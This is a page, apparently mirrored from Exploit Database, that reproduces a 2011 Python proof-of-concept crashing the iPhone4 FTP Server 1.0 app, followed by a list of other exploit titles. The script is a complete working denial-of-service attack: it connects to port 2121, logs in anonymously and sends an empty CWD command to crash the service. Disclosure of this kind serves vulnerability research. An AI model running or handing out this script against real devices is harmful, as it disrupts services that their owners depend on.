iPhone4 FTP Server 1.0 – Empty CWD-RETR Remote Crash

Exploit Database
51 阅读

作者： offsetIntruder

日期： 2011-05-31
类别：
- dos
平台：
- hardware
来源：https://www.exploit-db.com/exploits/17351/

# Exploit Title: iPhone4 FTP Server V1.0 - Empty CWD-RETR Remote Crash
# Date: 2011-05-30
# Author: offsetIntruder
# Software Link: http://itunes.apple.com/us/app/ftp-server/id356055128?mt=8
# Version: 1.0
# Tested on: iPhone4 IOS 4.3.2
# CVE: N/A
 
import socket
import sys
 
user="anonymous"

 
print("\n iPhone4 FTP Server By Zhang Boyang - Empty CWD-RETR Remote Crash\n")


def ExploitFTP(target):
	s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
	s.connect((target,2121))
	data = s.recv(1024)
	print("[+] Sending user login...")
	s.send("USER " + user + '\r\n')
	data = s.recv(1024)
	print("[+] Sending empty CWD...\n")
	s.send("CWD \r\n")
	data = s.recv(1024)
	s.close()
	
target = sys.argv[1]
 
ExploitFTP(target)

last Exploits
iPhone4 FTP Server 1.0 – Empty CWD-RETR Remote Crash的更多信息

WebKit – ‘WebCore::Node::getFlag’ Use-After-Free：
UUSee ReliPlayer – ActiveX Remote Execution (PoC)：
hMAilServer 5.3.3 – IMAP Remote Crash (PoC)：
TP-Link TL-WR740N Wireless Router – Denial of Service：
Microsoft Windows Kernel – ‘win32k’ Denial of Service (MS16-135)：
Tiny HTTP Server 1.1.9 – Remote Crash (PoC)：
Linux Kernel 2.6.32-642/3.16.0-4 – ‘inode’ Integer Overflow：
EDraw Flowchart ActiveX Control 2.3 – ‘EDImage.ocx’ Remote Denial of Service (IE)：